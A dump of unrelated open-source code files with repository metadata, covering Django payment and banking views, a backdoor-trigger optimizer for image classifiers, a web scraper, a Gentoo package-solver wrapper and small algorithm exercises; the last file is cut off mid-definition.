(real_fee/month)*30 upgrade_delta = int(upgrade_delta+0.1) print(upgrade_delta) proxy_account.type += upgrade_delta if proxy_account.type not in {1, 5, 10, 20, 50}: return HttpResponse("accout_type_error") reopen_port(proxy_account.port) else: return HttpResponse("fail") print("sava proxy_account") proxy_account.save() return HttpResponseRedirect('/homepage')
flyz1360/scholarcloud
thuproxy/pay_views.py
pay_views.py
py
14,990
python
en
code
1
github-code
6
74550779386
import torch from torch import Tensor, nn import torchvision import os import numpy as np class Normalize: def __init__(self, n_channels, expected_values, variance): self.n_channels = n_channels self.expected_values = expected_values self.variance = variance assert self.n_channels == len(self.expected_values) def __call__(self, x): x_clone = x.clone() for channel in range(self.n_channels): x_clone[:, channel] = (x[:, channel] - self.expected_values[channel]) / self.variance[channel] return x_clone class Denormalize: def __init__(self, n_channels, expected_values, variance): self.n_channels = n_channels self.expected_values = expected_values self.variance = variance assert self.n_channels == len(self.expected_values) def __call__(self, x): x_clone = x.clone() for channel in range(self.n_channels): x_clone[:, channel] = x[:, channel] * self.variance[channel] + self.expected_values[channel] return x_clone class RegressionModel(nn.Module): def __init__(self, task, model, init_mask, init_pattern): self._EPSILON = 1e-7 super(RegressionModel, self).__init__() self.mask_tanh = nn.Parameter(torch.tensor(init_mask)) self.pattern_tanh = nn.Parameter(torch.tensor(init_pattern)) self.classifier = self._get_classifier(model) self.normalizer = self._get_normalize(task) self.denormalizer = self._get_denormalize(task) def forward(self, x): mask = self.get_raw_mask() pattern = self.get_raw_pattern() if self.normalizer: pattern = self.normalizer(self.get_raw_pattern()) x = (1 - mask) * x + mask * pattern return self.classifier(x) def get_raw_mask(self): mask = nn.Tanh()(self.mask_tanh) return mask / (2 + self._EPSILON) + 0.5 def get_raw_pattern(self): pattern = nn.Tanh()(self.pattern_tanh) return pattern / (2 + self._EPSILON) + 0.5 def _get_classifier(self, model): classifier = model for param in classifier.parameters(): param.requires_grad = False classifier.eval() return classifier.to('cuda') def _get_denormalize(self, task): if task == 'cifar10': denormalizer = Denormalize(3, [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261]) elif task == 'mnist': denormalizer = Denormalize(1, [0.5], [0.5]) elif task == 'imageNet': denormalizer = Denormalize(3,[0.485,0.456,0.406],[0.229,0.224,0.225]) elif task == 'gtsrb': denormalizer = None else: raise Exception("Invalid dataset") return denormalizer def _get_normalize(self, task): if task == 'cifar10': normalizer = Normalize(3, [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261]) elif task == 'mnist': normalizer = Normalize(1, [0.5], [0.5]) elif task == 'imageNet': normalizer = Denormalize(3,[0.485,0.456,0.406],[0.229,0.224,0.225]) elif task == 'gtsrb': normalizer = None else: raise Exception("Invalid dataset") return normalizer class Recorder: def __init__(self,target_label,task): super().__init__() # Best optimization results self.mask_best = None self.pattern_best = None self.reg_best = float('inf') self.target_label = target_label # Logs and counters for adjusting balance cost self.logs = [] self.cost_set_counter = 0 self.cost_up_counter = 0 self.cost_down_counter = 0 self.cost_up_flag = False self.cost_down_flag = False # Counter for early stop self.early_stop_counter = 0 self.early_stop_reg_best = self.reg_best # Cost self.cost = 1e-3 self.cost_multiplier_up = 2 self.cost_multiplier_down = 2 ** 1.5 self.task = task def reset_state(self): self.cost = 1e-3 self.cost_up_counter = 0 self.cost_down_counter = 0 self.cost_up_flag = False self.cost_down_flag = False print("Initialize cost to {:f}".format(self.cost)) def save_result_to_dir(self): result_dir = '%s/u_t_%s'%(self.task,self.task) if not os.path.exists(result_dir): os.makedirs(result_dir) result_dir = os.path.join(result_dir, str(self.target_label)) if not os.path.exists(result_dir): os.makedirs(result_dir) pattern_best = self.pattern_best mask_best = self.mask_best trigger = pattern_best * mask_best path_mask = os.path.join(result_dir, 'mask.png') path_pattern = os.path.join(result_dir, 'pattern.png') path_trigger = os.path.join(result_dir, 'trigger.png') torchvision.utils.save_image(mask_best, path_mask, normalize=True) torchvision.utils.save_image(pattern_best, path_pattern, normalize=True) torchvision.utils.save_image(trigger, path_trigger, normalize=True) class UniversalTrigger: def __init__(self): self.universal_trigger_dict = {} def train(task, model, target_label, init_mask, init_pattern, test_loader): # Build regression model regression_model = RegressionModel(task, model, init_mask, init_pattern).to('cuda') # Set optimizer optimizerR = torch.optim.Adam(regression_model.parameters(), lr=1e-1, betas=(0.5, 0.9)) # Set recorder (for recording best result) recorder = Recorder(target_label,task) for epoch in range(50): early_stop = train_step(regression_model, optimizerR, test_loader, recorder, epoch, target_label) if early_stop: break # Save result to dir recorder.save_result_to_dir() return recorder def train_step(regression_model, optimizerR, dataloader, recorder, epoch, target_label,early_stop=True): print("Epoch {} - Label: {}".format(epoch, target_label)) # Set losses cross_entropy = nn.CrossEntropyLoss() total_pred = 0 true_pred = 0 # Record loss for all mini-batches loss_ce_list = [] loss_reg_list = [] loss_list = [] loss_acc_list = [] # Set inner early stop flag inner_early_stop_flag = False for batch_idx, (inputs, labels) in enumerate(dataloader): # Forwarding and update model optimizerR.zero_grad() inputs = inputs.to('cuda') sample_num = inputs.shape[0] total_pred += sample_num target_labels = torch.ones((sample_num), dtype=torch.int64).to('cuda') * target_label predictions = regression_model(inputs) loss_ce = cross_entropy(predictions, target_labels) loss_reg = torch.norm(regression_model.get_raw_mask(), 2) total_loss = loss_ce + recorder.cost * loss_reg total_loss.backward() optimizerR.step() # Record minibatch information to list minibatch_accuracy = torch.sum(torch.argmax(predictions, dim=1) == target_labels).detach() * 100. / sample_num loss_ce_list.append(loss_ce.detach()) loss_reg_list.append(loss_reg.detach()) loss_list.append(total_loss.detach()) loss_acc_list.append(minibatch_accuracy) true_pred += torch.sum(torch.argmax(predictions, dim=1) == target_labels).detach() loss_ce_list = torch.stack(loss_ce_list) loss_reg_list = torch.stack(loss_reg_list) loss_list = torch.stack(loss_list) loss_acc_list = torch.stack(loss_acc_list) avg_loss_ce = torch.mean(loss_ce_list) avg_loss_reg = torch.mean(loss_reg_list) avg_loss = torch.mean(loss_list) avg_loss_acc = torch.mean(loss_acc_list) # Check to save best mask or not if avg_loss_acc >= 99. and avg_loss_reg < recorder.reg_best: recorder.mask_best = regression_model.get_raw_mask().detach() recorder.pattern_best = regression_model.get_raw_pattern().detach() recorder.reg_best = avg_loss_reg recorder.save_result_to_dir() print(" Updated !!!") # Show information print(' Result: Accuracy: {:.3f} | Cross Entropy Loss: {:.6f} | Reg Loss: {:.6f} | Reg best: {:.6f}'.format( true_pred * 100. / total_pred, avg_loss_ce, avg_loss_reg, recorder.reg_best)) # Check early stop if early_stop: if recorder.reg_best < float('inf'): if recorder.reg_best >= 99. * recorder.early_stop_reg_best: recorder.early_stop_counter += 1 else: recorder.early_stop_counter = 0 recorder.early_stop_reg_best = min(recorder.early_stop_reg_best, recorder.reg_best) if ( recorder.cost_down_flag and recorder.cost_up_flag and recorder.early_stop_counter >= 25): print('Early_stop !!!') inner_early_stop_flag = True if not inner_early_stop_flag: # Check cost modification if recorder.cost == 0 and avg_loss_acc >= 99.: recorder.cost_set_counter += 1 if recorder.cost_set_counter >= 5: recorder.reset_state() else: recorder.cost_set_counter = 0 if avg_loss_acc >= 99.: recorder.cost_up_counter += 1 recorder.cost_down_counter = 0 else: recorder.cost_up_counter = 0 recorder.cost_down_counter += 1 if recorder.cost_up_counter >= 5: recorder.cost_up_counter = 0 print("Up cost from {} to {}".format(recorder.cost, recorder.cost * recorder.cost_multiplier_up)) recorder.cost *= recorder.cost_multiplier_up recorder.cost_up_flag = True elif recorder.cost_down_counter >= 5: recorder.cost_down_counter = 0 print("Down cost from {} to {}".format(recorder.cost, recorder.cost / recorder.cost_multiplier_down)) recorder.cost /= recorder.cost_multiplier_down recorder.cost_down_flag = True # Save the final version if recorder.mask_best is None: recorder.mask_best = regression_model.get_raw_mask().detach() recorder.pattern_best = regression_model.get_raw_pattern().detach() return inner_early_stop_flag
Mr-Ace-1997/SGBA-A-Stealthy-Scapegoat-Backdoor-Attack-against-Deep-Neural-Networks
utils_universal_trigger.py
utils_universal_trigger.py
py
10,352
python
en
code
0
github-code
6
10502382952
class Solution: # @param A : string # @return an integer def atoi(self, s): s = s.strip() # strips all spaces on left and right if not s: return 0 sign = -1 if s[0] == '-' else 1 val, index = 0, 0 if s[0] in ['+', '-']: index = 1 while index < len(s) and s[index].isdigit(): val = val*10 + ord(s[index]) - ord('0') # assumes there're no invalid chars in given string index += 1 #return sign*val return max(-2**31, min(sign * val,2**31-1))
anojkr/help
interview_bit/string/atoi.py
atoi.py
py
542
python
en
code
0
github-code
6
26191759535
import requests import json import re import time import csv import MySQLdb as mdb from bs4 import BeautifulSoup import numpy as np import pandas as pd from helpers import * """ This script scrapes and stores the fantasy points achieved by each player for the 2013 season. The data is stored in a .csv file. """ def main(): #open .csv file to store data and writes col names wfile = open("espn-actual2.csv", "wb") field_names = ['game_id', 'plyr_id', 'tot_pts','week'] writer = csv.writer(wfile) writer.writerow(field_names) #for each week in the 2013 season, the player id, game id, and points scored are scraped and stored in the .csv file for w in range(1,3): for pg in range(0, 300, 50): pts_url = "http://games.espn.go.com/ffl/leaders?&scoringPeriodId=%s&seasonId=2013&startIndex=%s" % (w, pg) pts_res = requests.get(pts_url) soup = BeautifulSoup(pts_res.content) for tr in soup.find_all('tr', class_="pncPlayerRow"): id_match = re.search(r'plyr(\d+)',tr['id']) id = int(id_match.group(1)) td_pts = tr.find('td', class_="playertableStat appliedPoints appliedPointsProGameFinal") projpts = td_pts.contents[0].encode('ascii', 'ignore') td_game = tr.find('td', class_="gameStatusDiv") href = td_game.find('a') href_str = str(href) game_match = re.search(r'gameId=(\d+)', href_str) game_id = game_match.group(1) if projpts == '--': projpts = 0 data = [game_id, id, projpts, w] writer.writerow(data) wfile.close() if __name__ == '__main__': main()
kwheeler27/insight_datasci
data/actual_fantasy_pts.py
actual_fantasy_pts.py
py
1,604
python
en
code
1
github-code
6
26829757478
#!/usr/bin/python import json import utils import logging import os import subprocess import smt_encoding import pysmt.shortcuts import re import requests import core_data import hyportage_pattern import hyportage_db from pysmt.smtlib.parser import SmtLib20Parser import cStringIO """ This file contains all the functions related to solving the constraints generated from a set of spls, in order to compute a new configuration of the system """ __author__ = "Michael Lienhardt and Jacopo Mauro" __copyright__ = "Copyright 2017, Michael Lienhardt and Jacopo Mauro" __license__ = "GPL3" __version__ = "0.5" __maintainer__ = "Michael Lienhardt and Jacopo Mauro" __email__ = "michael [email protected] & [email protected]" __status__ = "Prototype" ########################################################################## # UTILITIES TO CALL THE HYVAR-REC SOLVER ########################################################################## def run_local_hyvar(json_data, explain_modality, cmd, par_cores): """ Run hyvar locally assuming that there is a command hyvar-rec """ file_name = utils.get_new_temp_file(".json") with open(file_name, "w") as f: json.dump(json_data, f) cmd.extend(["--constraints-minimization", "--features-as-boolean", "--no-default-preferences"]) if explain_modality: cmd.append("--explain") if par_cores > 1: cmd.extend(["-p", unicode(par_cores)]) cmd.append(file_name) # executing the solver utils.phase_start("Running: " + unicode(cmd)) process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = process.communicate() if process.returncode != 0: logging.error("command ended with an error code: " + str(process.returncode)) return None logging.debug("Stderr of the command") logging.debug(err) utils.phase_end("Execution ended") res = json.loads(out) return res def run_remote_hyvar(json_data, explain_modality, url): """ Run hyvar """ if explain_modality: url += "/explain" else: url += "/process" utils.phase_start("Invoking url: " + url) response = requests.post(url, data=json.dumps(json_data), headers={'content-type': 'application/json'}) utils.phase_end("Execution ended") if response.status_code != requests.codes.ok: logging.error("server answered with an error code: " + str(response.status_code)) return None res = response.json() if 'error' in res: logging.error("server answered with an error message: " + json.dumps(res)) return None return res run_hyvar = None ########################################################################## # 1. INITIALIZE THE DATA (COMPUTE REQUEST AND UPDATE THE DATABASE) ########################################################################## def process_request(pattern_repository, id_repository, config, atoms): """ This function simply takes the user request and his USE configuration from the environment, and translate them in relevant data :param pattern_repository: the pattern repository of hyportage :param id_repository: the id repository of hyportage :param mspl: the mspl of hyportage :param spl_groups: the spl_groups of hyportage :param config: the config object :param atoms: the user request :return: the list of spls involved in the request (extended with the ones in the config), with the corresponding SMT constraint. Additionally, the pattern repository is extended with the new patterns, and the config object have been updated with th USE user configuration """ requested_patterns = set([hyportage_pattern.pattern_create_from_atom(atom) for atom in atoms]) requested_patterns.update(config.pattern_required_flat) config.set_use_manipulation_env(os.environ.get("USE", "").split()) root_spls, constraint = smt_encoding.convert_patterns(pattern_repository, id_repository, requested_patterns) return root_spls, constraint ########################################################################## # 2. SOLVER WRAPPER ########################################################################## def get_preferences_core(id_repository, mspl, installed_spls, spl_name_set): """ the priority of preferences is decided as follows: - remove less packages installed as possible, - minimize number of new packages to install :param id_repository: the repository of hyportage :param mspl: the mspl of hyportage :param installed_spls: the currently installed spls with their configuration :param spl_name_set: the names of the spls considered in the reconfiguration process :return: an equation encoding the preference as described previously """ installed_spls = { spl_name for spl_name in installed_spls.iterkeys() if (spl_name in spl_name_set) and (not mspl[spl_name].is_deprecated)} uninstalled_spls = spl_name_set - installed_spls # preference for removing less packages installed and not deprecated as possible res = '0' if installed_spls: res = " + ".join([ smt_encoding.get_spl_hyvarrec(id_repository, spl_name) for spl_name in installed_spls]) # preference to minimize number of new packages to install if uninstalled_spls: res = res + " - (" + (" + ".join([ smt_encoding.get_spl_hyvarrec(id_repository, spl_name) for spl_name in uninstalled_spls])) + ")" return [res] def get_preferences_use_flags(id_repository, mspl, spl_names): """ This function translates the use flag default selection of the spl in parameter into a preferences TODO: implement this function. It requires an API change in the SPL class to do it efficiently. :param id_repository: the id repository of hyportage :param mspl: the mspl of hyportage :param spl_names: the names of the spls to include in the preferences construction :return: an equation encoding the default configuration of the spls in parameter """ use_flags_positive = set() use_flag_negative = set() return 0 def installed_spls_to_solver(id_repository, installed_spls, spl_names): res = [] for spl_name, use_selection in installed_spls.iteritems(): if spl_name in spl_names: res.append(smt_encoding.get_spl_hyvarrec(id_repository, spl_name)) return res def get_better_constraint_visualization(id_repository, mspl, constraints): """ function that manipulates the constraints in a more readable form for analysing them. Useful for debugging or error reporting :param id_repository: the id repository of hyportage :param mspl: the mspl of hyportage :param constraints: the constraints to manipulate :return: the manipulated constraints """ ls = [] parser = SmtLib20Parser() for i in constraints: f = cStringIO.StringIO(i) script = parser.get_script(f) f.close() formula = script.get_last_formula() formula = pysmt.shortcuts.to_smtlib(formula, daggify=False) # translate packages where_declared = "user-required: " spl_ids = set(re.findall('(p[0-9]+)', formula)) for spl_id in spl_ids: name = id_repository.ids[spl_id][1] formula = re.sub(spl_id, name, formula) if i in mspl[name].smt: where_declared = name + ": " # translate uses use_ids = set(re.findall('(u[0-9]+)', formula)) for use_id in use_ids: formula = re.sub(use_id, id_repository.ids[use_id][2] + "#" + id_repository.ids[use_id][1], formula) ls.append(where_declared + formula) return ls def generate_to_install_spls(id_repository, mspl, feature_list): """ translate the output of the solver into a system to install (mapping from spl names to use flag selection) :param id_repository: the id repository of hyportage :param mspl: the mspl of hyportage :param feature_list: the solution found by the solver :return: a dictionary spl_name -> use flag selection """ # 1. translate the computed solution into a configuration res_core = core_data.dictSet() use_flags = [] for feature in feature_list: el = id_repository.data_from_id(feature) if el[0] == "package": # el = ("package", spl_name) res_core.add_key(el[1]) else: # el = ("use", use, spl_name) use_flags.append((el[1], el[2])) for use_flag, spl_name in use_flags: if spl_name in res_core: res_core.add(spl_name, use_flag) # 2. compares the computed solution to the actual spl use flag configuration, and generate the final configuration res = core_data.dictSet() for spl_name, use_selection_core in res_core.iteritems(): spl = mspl[spl_name] if spl.use_selection_core == use_selection_core: res[spl_name] = spl.use_selection_full else: annex_use_flags = spl.use_selection_full - spl.iuses_core res[spl_name] = use_selection_core | annex_use_flags return res def solve_spls( id_repository, config, mspl, spl_groups, spls, annex_constraint, exploration_use, exploration_mask, exploration_keywords, explain_modality=False): """ Solves the spls in input locally assuming that there is a command hyvar-rec :param id_repository: the id repository of hyportage :param config: the config of hyportage :param mspl: the mspl of hyportage :param spl_groups: the spl groups of hyportage :param spls: the spls to solve :param annex_constraint: the additional constraint to add in the solver input :param exploration_use: boolean saying if the solver can change the use flag default selection :param exploration_mask: boolean saying if the solver can change the use mask status of the packages :param exploration_keywords: boolean saying if the solver can change the keywords of the packages :param explain_modality: boolean saying if a problem should be explained (by default: False) :return: the solution found by the solver, if it exists """ # 1. construct the input data for the solver # 1.1. construct the constraint constraint = annex_constraint[:] spl_group_names = core_data.dictSet() #tmp = 0 for spl in spls: spl_group_names.add(core_data.spl_core_get_spl_group_name(spl.core), spl) included = (spl.unmasked or exploration_mask) and (spl.unmasked_keyword or exploration_keywords) if included: #tmp = tmp + 1 constraint.extend(spl.smt) if exploration_use: constraint.extend(spl.smt_use_exploration) else: constraint.extend(spl.smt_use_selection) else: #logging.info("spl \"" + spl.name + "\" is not scheduled for possible installation") constraint.extend(spl.smt_false) for spl_group_name, spls_tmp in spl_group_names.iteritems(): spl_group = spl_groups[spl_group_name] constraint.extend(spl_group.smt) for spl in spl_group: if spl not in spls_tmp: constraint.append(smt_encoding.smt_to_string(smt_encoding.get_spl_smt_not(id_repository, spl.name))) #logging.info("included spl: " + str(tmp)) logging.debug("number of constraints to solve: " + str(len(constraint))) # 1.2. construct the preferences spl_names = {spl.name for spl in spls} preferences = get_preferences_core(id_repository, mspl, config.installed_packages, spl_names) # 1.3. construct the current system current_system = [] #installed_spls_to_solver(id_repository, installed_spls, spl_names) data_configuration = {"selectedFeatures": current_system, "attribute_values": [], "context_values": []} # current configuration data_smt_constraints = {"formulas": constraint, "features": [], "other_int_symbols": []} data = { "attributes": [], # attributes of the features (empty in our case) "contexts": [], # contexts to consider (empty in our case) "configuration": data_configuration, "constraints": [], # constraints to fill in hyvarrec format (empty in our case for efficiency) "preferences": preferences, # preferences in hyvarrec format "smt_constraints": data_smt_constraints, "hyvar_options": ["--features-as-boolean", "--constraints-minimization", "--no-default-preferences"] } # 2. run hyvar-rec res = run_hyvar(data) if res is None: return None logging.debug("HyVarRec output: " + json.dumps(res)) # 4. managing the solver output if res["result"] != "sat": if explain_modality: # todo handle explain modality when the answer is unsat # try to print a better explanation of the constraints constraints = get_better_constraint_visualization(id_repository, mspl, res["constraints"]) logging.error("Conflict detected. Explanation:\n" + "\n".join(constraints) + '\n') return None return generate_to_install_spls(id_repository, mspl, res['features']) def generate_installation_files( mspl, path_emerge_script, path_use_flag_configuration, path_mask_configuration, path_keywords_configuration, old_installation, new_installation): """ This function generates two files: 1. the script file to execute to install and uninstall the spls found by the solver 2. spl configuration file (usually package.use) from the solution found by the solver :param mspl: the mspl of hyportage :param path_emerge_script: path to the script file to generate :param path_use_flag_configuration: path to the configuration file to generate :param path_mask_configuration: the path to the unmask file to generate :param path_keywords_configuration: the path to the accept_keywords file to generate :param old_installation: the currently installed spls :param new_installation: the spls to install, found by the solver :return: None (but the script file has been generated) """ # the spls to emerge are the ones that are not present in the old installation, or that have a new configuration added_spl_names = [] for spl_name, product in new_installation.iteritems(): if spl_name in old_installation: if old_installation[spl_name] != product: added_spl_names.append(spl_name) else: added_spl_names.append(spl_name) # the spls to remove are the ones that are not in the new configuration and that are not replaced by a new version removed_spl_names = [] new_spl_goups_info = core_data.dictSet() for spl_name in new_installation.iterkeys(): spl = mspl[spl_name] new_spl_goups_info.add(core_data.spl_core_get_spl_group_name(spl.core), spl) for spl_name in old_installation.iterkeys(): spl = mspl[spl_name] new_versions = new_spl_goups_info.get(core_data.spl_core_get_spl_group_name(spl.core)) if new_versions is None: removed_spl_names.append(spl_name) else: replaced = False for new_spl in new_versions: if (spl.slot == new_spl.slot) and (spl.name != new_spl.name): replaced = True break if replaced: removed_spl_names.append(spl_name) # write the files added_spl_names.sort() with open(path_emerge_script, 'w') as f: f.write("#!/bin/bash\n") f.write("\n") f.write("# File auto-generated by the hyportage tool\n") f.write("# Do not update, any modification on this file will will overwritten by the tool\n") f.write("\n") if added_spl_names: f.write("emerge -p --newuse " + " ".join(["=" + spl_name for spl_name in added_spl_names]) + "\n") if removed_spl_names: f.write("emerge -p --unmerge " + " ".join(["=" + spl_name for spl_name in removed_spl_names]) + "\n") f.write("\n") with open(path_use_flag_configuration, 'w') as f: f.write("# File auto-generated by the hyportage tool\n") f.write("# Do not update, any modification on this file will will overwritten by the tool\n") f.write("\n") for spl_name in added_spl_names: use_selection = new_installation[spl_name] string = "=" + spl_name + " " string = string + " ".join(use_selection) use_unselection = mspl[spl_name].iuses_full - use_selection if use_unselection: string = string + " -" + " -".join(use_unselection) + "\n" f.write(string) f.write("\n") with open(path_mask_configuration, 'w') as f: f.write("# File auto-generated by the hyportage tool\n") f.write("# Do not update, any modification on this file will will overwritten by the tool\n") f.write("\n") for spl_name in added_spl_names: f.write("=" + spl_name + "\n") #if not mspl[spl_name].unmasked: # f.write("=" + spl_name) f.write("\n") with open(path_keywords_configuration, 'w') as f: f.write("# File auto-generated by the hyportage tool\n") f.write("# Do not update, any modification on this file will will overwritten by the tool\n") f.write("\n") for spl_name in added_spl_names: #f.write("=" + spl_name + " ~" + hyportage_db.mspl_config.arch + "\n") f.write("=" + spl_name + " **\n") #if not mspl[spl_name].unmasked_keyword: # f.write("=" + spl_name + " ~" + hyportage_db.mspl_config.arch) f.write("\n") ########################################################################## # 3. SPL SET COMPUTATION ########################################################################## def next_spls(pattern_repository, spl): res = set() pattern_iterator = spl.dependencies.iterkeys() for pattern in pattern_iterator: res.update(pattern_repository.get_with_default(pattern).matched_spls) return res def get_dependency_transitive_closure(pattern_repository, mspl, spls): for spl in mspl.itervalues(): spl.visited = False nexts = spls res = set() while len(nexts) > 0: accu = set() for spl in nexts: spl.visited = True res.add(spl) accu.update(next_spls(pattern_repository, spl)) nexts = filter(lambda spl: not spl.visited, accu) return res
HyVar/gentoo_to_mspl
host/scripts/reconfigure.py
reconfigure.py
py
16,982
python
en
code
10
github-code
6
31215041211
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('siteScrape', '0001_initial'), ] operations = [ migrations.AddField( model_name='teacher', name='averageGrade', field=models.CharField(default=b'', max_length=3), ), migrations.AddField( model_name='teacher', name='responseRate', field=models.DecimalField(default=0, max_digits=3, decimal_places=2), ), migrations.AlterField( model_name='teacher', name='quarters', field=models.IntegerField(default=0), ), ]
anikan/Classify
migrations/0002_auto_20150910_1439.py
0002_auto_20150910_1439.py
py
755
python
en
code
0
github-code
6
38465761430
from Christiaan.csvLoading.CSVLoader import read_csv_tableau from Christiaan.dataCleaning.dataCleaner import cleanTechColumn import pandas as pd import numpy as np def readTechCSV(filename): df = read_csv_tableau(filename, filename) df = df[['Employee Number', 'Firstname Firstname', 'Lastname Lastname', 'Level Level', 'Practice Practice', 'Suggested Daily Rate', 'Name Name']] df.columns =['Employee Number', 'Firstname', 'Lastname', 'Level', 'Practice', 'Suggested Daily Rate', 'Technology'] df.sort_values('Employee Number', inplace=True) return df def fixLevels(dataFrame): emp_first_names = ['Jean-Francois', 'Arnaud', 'Vasilij', 'Pieter', 'Koen', 'Faisal', 'Gunther', 'Philip', 'Geoffrey'] emp_last_names = ['Gigot', 'Deflorenne', 'Nevlev', 'Vandamme', 'Dils', 'Orakzai', 'Hellebaut', 'Allegaert', 'Moerenhoudt'] for i in range(len(emp_first_names)): f = emp_first_names[i] l = emp_last_names[i] if f == 'Jean-Francois' and l == 'Gigot': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director' elif f == 'Arnaud' and l == 'Deflorenne': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Partner' elif f == 'Vasilij' and l == 'Nevlev': dataFrame.drop(dataFrame[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l)].index, axis=0, inplace=True) elif f == 'Pieter' and l == 'Vandamme': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director' elif f == 'Koen' and l == 'Dils': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director' elif f == 'Faisal' and l == 'Orakzai': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Senior' elif f == 'Gunther' and l == 'Hellebaut': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Senior' elif f == 'Philip' and l == 'Allegaert': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director' elif f == 'Geoffrey' and l == 'Moerenhoudt': dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Consultant' dataFrame.loc[np.logical_or(dataFrame.Level=='Senior 13', dataFrame.Level=='Senior 8'),'Level'] = 'Senior' return dataFrame def cleanTech(dataFrame, techColumnName): df = cleanTechColumn(dataFrame, techColumnName) df.drop_duplicates(inplace=True) df = fixLevels(df) return df def exportDF(dataFrame, fileName, path=''): dataFrame.to_csv(path_or_buf=path+fileName, sep=',', index=False) # Read Tableau csv export file = r'C:\Users\adebola.oshomoji\PycharmProjects\case-keyrus\tableau_technology_export.csv' df = readTechCSV(file) # Clean Technology column values and drop duplicates df = cleanTech(df, 'Technology') # Write DataFrame to csv exportDF(df, 'EmployeeTechnologyData.csv') #print(df.Level.unique())
chrike-platinum/training-recommender
Ade/visualisationPrep.py
visualisationPrep.py
py
3,541
python
en
code
0
github-code
6
648818691
from argparse import ArgumentParser from inference import Infer parser = ArgumentParser() parser.add_argument("modelname", help="name of model to use") parser.add_argument("imagepath", help="relative path to image") parser.add_argument("--use_gpu", help="use gpu or not", nargs="?", default=False, const=True, type = bool) args = parser.parse_args() infer = Infer(args.use_gpu) try: infer.infer(args.imagepath, args.modelname) except: print("Something BAD happened!!!")
Deepesh22/Crowd-Counting
cli.py
cli.py
py
482
python
en
code
0
github-code
6
27213329955
import sys from collections import deque dx = [-1, 1, 0, 0] dy = [0, 0, -1, 1] INF = 1e9 N, M = map(int, sys.stdin.readline().rstrip().split()) maps = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(N)] hospital_comb = [] answer = INF def dfs(hospital_list, pick_list, idx): if idx == len(hospital_list): if len(pick_list) == M: hospital_comb.append(pick_list[:]) return pick_list.append(hospital_list[idx]) dfs(hospital_list, pick_list, idx + 1) pick_list.pop() dfs(hospital_list, pick_list, idx + 1) def bfs(hospital_list): global answer q = deque([]) visited = [[False] * N for _ in range(N)] time_maps = [[0] * N for _ in range(N)] for h in hospital_list: q.append((h[0], h[1], 0)) visited[h[0]][h[1]] = True while q: x, y, cnt = q.popleft() for i in range(4): nx, ny = x + dx[i], y + dy[i] if 0 <= nx < N and 0 <= ny < N and not visited[nx][ny]: if maps[nx][ny] == 0 or maps[nx][ny] == -2: q.append((nx, ny, cnt + 1)) visited[nx][ny] = True time_maps[nx][ny] = cnt + 1 time = 0 for i in range(N): for j in range(N): if maps[i][j] == 0 and time_maps[i][j] == 0: return if maps[i][j] == 0: time = max(time, time_maps[i][j]) answer = min(answer, time) hospital = [] for i in range(N): for j in range(N): if maps[i][j] == 2: hospital.append((i, j)) maps[i][j] = -2 if maps[i][j] == 1: maps[i][j] = -1 dfs(hospital, [], 0) for i in range(len(hospital_comb)): bfs(hospital_comb[i]) print(-1) if answer == INF else print(answer)
hammii/Algorithm
CodeTree_python/바이러스_백신.py
바이러스_백신.py
py
1,804
python
en
code
2
github-code
6
38852384412
from django.core import validators from rest_framework import serializers from django.utils.translation import gettext_lazy as _ from degvabank.apps.account.models import Account from degvabank.apps.card.models import CreditCard from degvabank.apps.transaction.utils import is_our_number from .models import Transaction class TransactionSerializer(serializers.ModelSerializer): class Meta: model = Transaction fields = "__all__" class UserTransactionSerializer(serializers.ModelSerializer): acc = card = dst = dst_not_our = None document_id = serializers.CharField( write_only=True, max_length=15, validators=[ validators.RegexValidator( regex=r"^[eEvVjJ]\d+$", message=_("your document id is not well formatted"), ), ], ) def validate_source(self, value): user = self.context["request"].user self.acc = user.accounts.filter(id=value, is_active=True).first() self.card = user.credit_cards.filter(number=value, is_active=True).first() if not (self.acc or self.card): raise serializers.ValidationError(_("Invalid source account or card")) return value def validate_target(self, value): # TODO: if value not ours: return value if not is_our_number(value): self.dst = value self.dst_not_our = True return value dst_acc = Account.objects.filter(id=value, is_active=True).first() dst_card = CreditCard.objects.filter(number=value, is_active=True).first() if not (dst_acc or dst_card): raise serializers.ValidationError( _("Target account or card does not exists") ) self.dst = dst_card or dst_acc return value def validate_document_id(self, value): if not self.dst_not_our and self.dst and self.dst.user.document_id.lower() != str(value).lower(): raise serializers.ValidationError( _("Target account or card is not associated with that document id") ) return value def validate_amount(self, value): if self.acc and self.acc.balance < value: raise serializers.ValidationError(_("Insufficent balance")) if self.card and self.card.credit < value: raise serializers.ValidationError(_("Insufficent balance")) return value class Meta: model = Transaction fields = [ "id", "source", "target", "document_id", "amount", "type", "status", "reason", "date", ] read_only_fields = ("type", "status", "date", "id") def create(self, validated_data): field_names = [field.name for field in self.Meta.model._meta.get_fields()] data = {a: b for a, b in validated_data.items() if a in field_names} kwargs = { "amount": data["amount"], "reason": data["reason"], "source": { "number": data["source"] }, "target": { "number": data["target"], "document_id": validated_data["document_id"], } } return self.Meta.model.objects.create_any_transaction(**kwargs) class TransactionCardSerializer(serializers.Serializer): number = serializers.CharField() security_code = serializers.CharField() expiration_date = serializers.DateTimeField() document_id = serializers.CharField( required=False, write_only=True, max_length=15, validators=[ validators.RegexValidator( regex=r"^[eEvVjJ]\d+$", message=_("your document id is not well formatted"), ), ], ) class TransactionAccountSerializer(serializers.Serializer): number = serializers.CharField() document_id = serializers.CharField( required=True, write_only=True, 